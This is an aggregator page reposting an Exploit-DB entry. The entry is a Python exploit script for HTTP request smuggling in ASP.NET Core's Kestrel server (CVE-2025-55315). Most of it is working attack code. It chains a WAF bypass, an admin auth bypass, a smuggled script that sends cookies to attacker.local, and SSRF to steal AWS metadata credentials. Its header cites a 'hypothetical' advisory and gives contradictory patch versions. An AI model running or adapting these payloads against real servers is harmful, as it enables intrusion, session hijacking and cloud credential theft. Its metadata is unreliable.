惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
L
LINUX DO - 最新话题
Recorded Future
Recorded Future
月光博客
月光博客
博客园 - 【当耐特】
博客园 - 叶小钗
宝玉的分享
宝玉的分享
量子位
雷峰网
雷峰网
博客园 - 三生石上(FineUI控件)
The Cloudflare Blog
Vercel News
Vercel News
L
LangChain Blog
B
Blog
Y
Y Combinator Blog
爱范儿
爱范儿
GbyAI
GbyAI
S
Security @ Cisco Blogs
T
The Blog of Author Tim Ferriss
A
About on SuperTechFans
博客园 - Franky
P
Palo Alto Networks Blog
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
云风的 BLOG
云风的 BLOG
C
Cisco Blogs
Scott Helme
Scott Helme
I
Intezer
T
The Exploit Database - CXSecurity.com
MyScale Blog
MyScale Blog
T
Tor Project blog
D
Darknet – Hacking Tools, Hacker News & Cyber Security
T
Troy Hunt's Blog
N
News and Events Feed by Topic
大猫的无限游戏
大猫的无限游戏
F
Fortinet All Blogs
www.infosecurity-magazine.com
www.infosecurity-magazine.com
Application and Cybersecurity Blog
Application and Cybersecurity Blog
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
S
Security Affairs
Cyberwarzone
Cyberwarzone
PCI Perspectives
PCI Perspectives
小众软件
小众软件
D
DataBreaches.Net
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
Know Your Adversary
Know Your Adversary
Forbes - Security
Forbes - Security
S
Securelist
cs.CV updates on arXiv.org
cs.CV updates on arXiv.org
C
Cyber Attacks, Cyber Crime and Cyber Security
The Last Watchdog
The Last Watchdog

Exploit-DB.com RSS Feed

MEmu Android Emulator 9.2.7.0 - Local Privilege Escalation OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive
OffSec’s Exploit Database Archive
Mohammed Idrees Banyamer · 2026-04-06 · via Exploit-DB.com RSS Feed
# Exploit Title: ASP.net  8.0.10 - Bypass
# Date: 2025-11-03
# Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# CVE: CVE-2025-55315
# Tested on: .NET Kestrel (unpatched) - ASP.NET Core on localhost (lab environment)
# Platform: remote
# Type: webapps
# Attack Vector: Network (HTTP/HTTPS) - Remote exploitation via malformed chunked encoding
# CVSS: 9.8 (Critical) - Estimated: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
#
# Description:
#   This exploit demonstrates a critical HTTP Request Smuggling vulnerability in
#   unpatched versions of .NET Kestrel due to improper handling of malformed
#   chunk extensions (LF-only line endings). The script performs:
#     1. Automatic fingerprinting to detect vulnerable instances
#     2. Auth bypass to access restricted endpoints (/admin)
#     3. Session hijacking via response queue poisoning (JS cookie stealer)
#     4. SSRF to internal metadata services (e.g., AWS 169.254.169.254)
#   Includes WAF bypass using 'chUnKEd' header and generates detailed JSON reports.
#
#   The vulnerability allows full remote compromise: authentication bypass,
#   session theft, and internal network access — all from a single HTTP request.
#
#   Patched in .NET 9.0.1 / 8.0.10+ (October 2025).
#
# IMPORTANT SAFETY :
#   -  DO NOT RUN AGAINST PRODUCTION OR THIRD-PARTY SYSTEMS.
#   - Use only in isolated environments (VM, Docker with --network none).
#   - All payloads are educational and non-destructive by design.
#   - Modify payloads only within your controlled lab.
#
# References:
#   - CVE: https://nvd.nist.gov/vuln/detail/CVE-2025-55315
#   - Microsoft Security Advisory (hypothetical): https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55315


from __future__ import annotations
import socket
import ssl
import time
import argparse
import json
import os
from typing import Tuple, Optional

DEFAULT_TIMEOUT = 3.0
READ_CHUNK = 4096
REPORT_DIR = "kestrel_desync_reports"
os.makedirs(REPORT_DIR, exist_ok=True)

# ------------------ Utilities ------------------
def now_iso() -> str:
    return time.strftime('%Y-%m-%dT%H:%M:%SZ', time.gmtime())

def hexdump(b: bytes, maxlen: int = 200) -> str:
    shown = b[:maxlen]
    hexed = ' '.join(f"{x:02x}" for x in shown)
    return f"{hexed} ..." if len(b) > maxlen else hexed

def save_file(path: str, data: bytes) -> None:
    try:
        with open(path, 'wb') as f:
            f.write(data)
        print(f"[+] Saved: {path}")
    except Exception as e:
        print(f"[!] Save failed: {e}")

# ------------------ Networking ------------------
def send_http(host: str, port: int, data: bytes, use_tls: bool = False) -> Tuple[Optional[bytes], bool]:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(DEFAULT_TIMEOUT)
    try:
        if use_tls:
            ctx = ssl.create_default_context()
            s = ctx.wrap_socket(s, server_hostname=host)
        s.connect((host, port))
        s.sendall(data)

        parts = []
        while True:
            try:
                chunk = s.recv(READ_CHUNK)
                if not chunk: break
                parts.append(chunk)
            except socket.timeout:
                break
        resp = b''.join(parts)

        s.settimeout(0.2)
        try:
            s.recv(1)
            open_flag = True
        except:
            open_flag = False
        s.close()
        return resp, open_flag
    except Exception:
        return None, False

# ------------------ Request Builder (WAF Bypass) ------------------
def build_chunked(method: str, path: str, body: bytes, extra_headers: list = None) -> bytes:
    headers = [
        f"{method} {path} HTTP/1.1",
        "Host: localhost",
        "Transfer-Encoding: chUnKEd",  # WAF Bypass
        "Content-Type: text/plain",
    ]
    if extra_headers:
        headers.extend(extra_headers)
    headers.extend(["", ""])
    return "\r\n".join(headers).encode() + body

# ------------------ Fingerprint ------------------
def fingerprint(host: str, port: int, use_tls: bool) -> Tuple[bool, Optional[bytes]]:
    print(f"[*] Fingerprinting {host}:{port}...")
    payload = b"1\nx\n0\n\n"
    req = build_chunked("POST", "/", payload)
    resp, _ = send_http(host, port, req, use_tls)
    if resp and b"400" not in resp.split(b'\r\n', 1)[0]:
        print(f"[!] VULNERABLE: Accepted LF-only chunk!")
        return True, resp
    print(f"[+] Patched: 400 Bad Request")
    return False, resp

# ------------------ Exploit Chain ------------------
def exploit_chain(host: str, port: int, use_tls: bool):
    results = []

    # 1. Auth Bypass
    print(f"[!] 1. Auth Bypass → /admin")
    smug_admin = b"0\r\n\r\nGET /admin HTTP/1.1\r\nHost: localhost\r\nX-Bypass: yes\r\n\r\n"
    req1 = build_chunked("POST", "/", b"1;ext\nx\n" + smug_admin, ["Content-Length: 50"])
    resp1, _ = send_http(host, port, req1, use_tls)
    if resp1 and (b"admin" in resp1.lower() or b"dashboard" in resp1.lower()):
        results.append("Auth Bypass: SUCCESS")
        save_file(os.path.join(REPORT_DIR, f"admin_page_{host}_{port}.html"), resp1)
    else:
        results.append("Auth Bypass: FAILED")

    # 2. Session Hijacking
    print(f"[!] 2. Session Hijacking → JS Stealer")
    js_payload = (
        b"0\r\n\r\nGET / HTTP/1.1\r\nHost: localhost\r\n"
        b"Content-Type: text/html\r\nContent-Length: 120\r\n\r\n"
        b"<script>fetch('http://attacker.local/steal?c='+document.cookie)</script>"
    )
    req2 = build_chunked("POST", "/", b"1;ext\nx\n" + js_payload)
    send_http(host, port, req2, use_tls)
    results.append("Session Hijack: INJECTED")

    # 3. SSRF
    print(f"[!] 3. SSRF → AWS Metadata")
    ssrf = b"0\r\n\r\nGET http://169.254.169.254/latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: localhost\r\n\r\n"
    req3 = build_chunked("POST", "/", b"1;ext\nx\n" + ssrf)
    resp3, _ = send_http(host, port, req3, use_tls)
    if resp3 and b"role" in resp3:
        results.append("SSRF: SUCCESS")
        save_file(os.path.join(REPORT_DIR, f"ssrf_metadata_{host}_{port}.txt"), resp3)
    else:
        results.append("SSRF: FAILED")

    return results

# ------------------ Reporting ------------------
def save_json_report(host: str, port: int, use_tls: bool, results: list):
    report = {
        "target": f"{host}:{port}",
        "tls": use_tls,
        "timestamp": now_iso(),
        "cve": "CVE-2025-55315",
        "status": "VULNERABLE",
        "waf_bypass": "chUnKEd",
        "exploits": results
    }
    path = os.path.join(REPORT_DIR, f"REPORT_{host}_{port}_{int(time.time())}.json")
    with open(path, 'w', encoding='utf-8') as f:
        json.dump(report, f, indent=2)
    print(f"[+] JSON Report: {path}")

# ------------------ CLI ------------------
def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("target", help="host:port or host:port:tls")
    args = parser.parse_args()

    parts = args.target.split(":")
    host = parts[0]
    port = int(parts[1])
    use_tls = len(parts) > 2 and parts[2].lower() in ("tls", "1")

    print(f"\n=== Kestrel Desync Full Chain ===\nTarget: {host}:{port} (TLS: {use_tls})\n")

    is_vuln, _ = fingerprint(host, port, use_tls)
    if not is_vuln:
        print("[+] Target is patched. Exiting.")
        return

    results = exploit_chain(host, port, use_tls)
    save_json_report(host, port, use_tls, results)

    print(f"\n[+] Exploitation chain completed!")
    print(f"[+] All files in: {REPORT_DIR}")

if __name__ == "__main__":
    main()